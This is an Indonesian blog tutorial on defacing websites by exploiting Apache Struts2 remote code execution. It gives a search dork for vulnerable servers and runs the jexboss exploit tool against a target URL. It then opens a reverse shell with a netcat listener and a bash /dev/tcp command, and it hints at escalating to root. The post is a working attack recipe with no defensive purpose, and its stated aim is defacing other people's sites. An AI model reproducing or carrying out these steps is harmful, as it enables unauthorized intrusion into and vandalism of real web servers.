Author : UnknownTidak ada komentar
Cara Deface Dengan Apache Sruts2 ( Remote Code Execution)
yo apa kabar gaes :''v gue admin baru nih hehehe kali ini gue bakal share tutor tentangApache struts2 Remote Code Execution
sedikit info tentang Remote Code Execution ini Remote Code execution adalah sebuah vulnrability yang memungkinkan si attacker untuk memberikan code code berbahaya seperti namanya Remote Code kita bisa meremote kode kode tersebut lalu mengirimnya ke web target
yodah gk usah banyak cocot lagi :'v
Yup Langsung saja
Bahan :
Dork : intitle:"Struts Problem Report" intext:"development mode is enabled."
Python <- disini gaes
jexboss <- disini gaes
netcat <- disini gaes
Langsung Ke tutor
1.Buka CMD lalu ke folder jexboss nya
2.yang ke dua ketikkan
python jexboss.py -u http://targetklean.com
klo vuln ada bacaan vulnerable trus ketik yes
3.sekarang kita coba reverse shell
Buka Netcat nya trus ketikkan
nc -lnvp 123
habis itu ke jexbossnya yang berhasil kita exploit
4.ketikkan /bin/bash -i > /dev/tcp/ip/port 0>&1 2>&1\n
note: klo port mu blom di forward coba pakai ngrok
Klo port blom di forward cek tutor disini gaes Tutorial back conect with Ngrok (disni)
Done udah kita berhasil reverse shell tinggal di anuin
Vidionya Gaes : disini gaes
klo hoki sih bisa di root :''v
Artikel Terkait
Posted On : Senin, 10 Juli 2017Time : Juli 10, 2017